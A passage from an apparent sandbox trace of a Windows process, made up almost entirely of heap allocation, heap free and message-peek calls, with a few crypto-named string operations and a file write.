out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ebc9c0 [0200.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8790 | out: hHeap=0x970000) returned 1 [0200.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0200.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.580] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.580] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0200.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0200.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0200.582] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0200.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0200.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0200.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0200.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ea8790 [0200.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0200.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ed0bf0 [0200.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8790 | out: hHeap=0x970000) returned 1 [0200.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ea8790 [0200.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0bf0 | out: hHeap=0x970000) returned 1 [0200.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ed0bf0 [0200.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8790 | out: hHeap=0x970000) returned 1 [0200.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0200.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0200.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94560 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0200.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0200.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebc9c0 | out: hHeap=0x970000) returned 1 [0200.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0200.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0200.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38248 | out: hHeap=0x970000) returned 1 [0200.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ee4e20 [0200.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0bf0 | out: hHeap=0x970000) returned 1 [0200.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0200.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0200.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0200.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2f24018 [0200.643] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x14228, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x14228, lpOverlapped=0x0) returned 1 [0200.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0200.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 